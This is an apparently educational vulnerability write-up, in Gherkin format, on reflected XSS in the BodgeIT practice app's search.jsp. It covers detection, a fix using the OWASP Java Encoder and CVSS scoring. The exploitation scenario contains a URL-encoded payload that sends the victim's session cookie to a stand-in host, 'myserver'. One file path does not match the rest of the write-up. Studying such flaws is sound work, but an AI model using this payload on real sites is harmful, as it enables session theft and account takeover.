## Version 1.4.1
## language: en

Feature:
  TOE:
    BodgeIT
  Category:
    Injection Flaws
  Location:
    bodgeit/search.jsp - q (parameter)
  CWE:
    CWE-0079: Improper Neutralization of Input During Web Page Generation
    ('Cross-site Scripting') -base-
      https://cwe.mitre.org/data/definitions/79.html
    CWE-0074: Improper Neutralization of Special Elements in Output Used by a
    Downstream Component ('Injection') -class-
      https://cwe.mitre.org/data/definitions/74.html
    CWE-1019: Validate Inputs
      https://cwe.mitre.org/data/definitions/1019.html
  CAPEC:
    CAPEC-591: Reflected XSS -detailed-
      http://capec.mitre.org/data/definitions/591.html
    CAPEC-063: Cross-Site Scripting (XSS) -standard-
      http://capec.mitre.org/data/definitions/63.html
    CAPEC-242: Code Injection -meta-
      http://capec.mitre.org/data/definitions/242.html
  Rule:
    REQ.173: https://fluidattacks.com/web/en/rules/173/
  Goal:
    Run unintended JS code
  Recommendation:
    Sanitize user input

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
  TOE information:
    Given I am running BodgeIT in a docker container at
    """
    http://localhost:8000/bodgeit/
    """

  Scenario: Normal use case
  Normal site navigation
    Given I go to http://localhost:8000/bodgeit/search.jsp
    Then I can search for products

  Scenario: Static detection
  No input validation for unusual XSS payloads
    When I look at the code at "/bodgeit/root/contact.jsp"
    """
    ...
    10  String query = (String) request.getParameter("q");
    ...
    17  %>
    18  <b>You searched for:</b> <%= query %><br/><br/>
    19  <%
    ...
    """
    Then I see it outputs the "q" without validation

  Scenario: Dynamic detection
  Fuzzing for XSS
    Given I submit a search query wth an XSS payload
    """
    <script>alert(1)</script>
    """
    Then I get an alert in the results page

  Scenario: Exploitation
  Exfiltrate sensitive data via XSS
    Given I know there's an XSS vuln
    Then I send this link to a user
    """
    http://localhost:8000/bodgeit/search.jsp?q=%3Cscript%3Ealert%28%29%3Bdocumen
    t.location%3D%22http%3A%2F%2Fmyserver%2F%3Fc%3D%22%2Bdocument.cookie%3C%2Fsc
    ript%3E
    """
    Then when they click it, I get their session cookies
    And can take over their account

  Scenario: Remediation
  Sanitizing user input
    Given I Install OWASP Java Encoder in the project
    And patch the code as follows
    """
    ...
    10  String query = encoder.forHtml((String) request.getParameter("q"));
    ...
    17  %>
    18  <b>You searched for:</b> <%= query %><br/><br/>
    19  <%
    ...
    """
    Then XSS isn't posible anymore

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    7.1/10 (Medium) - AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N/
  Temporal: Attributes that measure the exploit's popularity and fixability
    6.6/10 (Medium) - E:F/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    6.6/10 (Medium) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2019-01-18
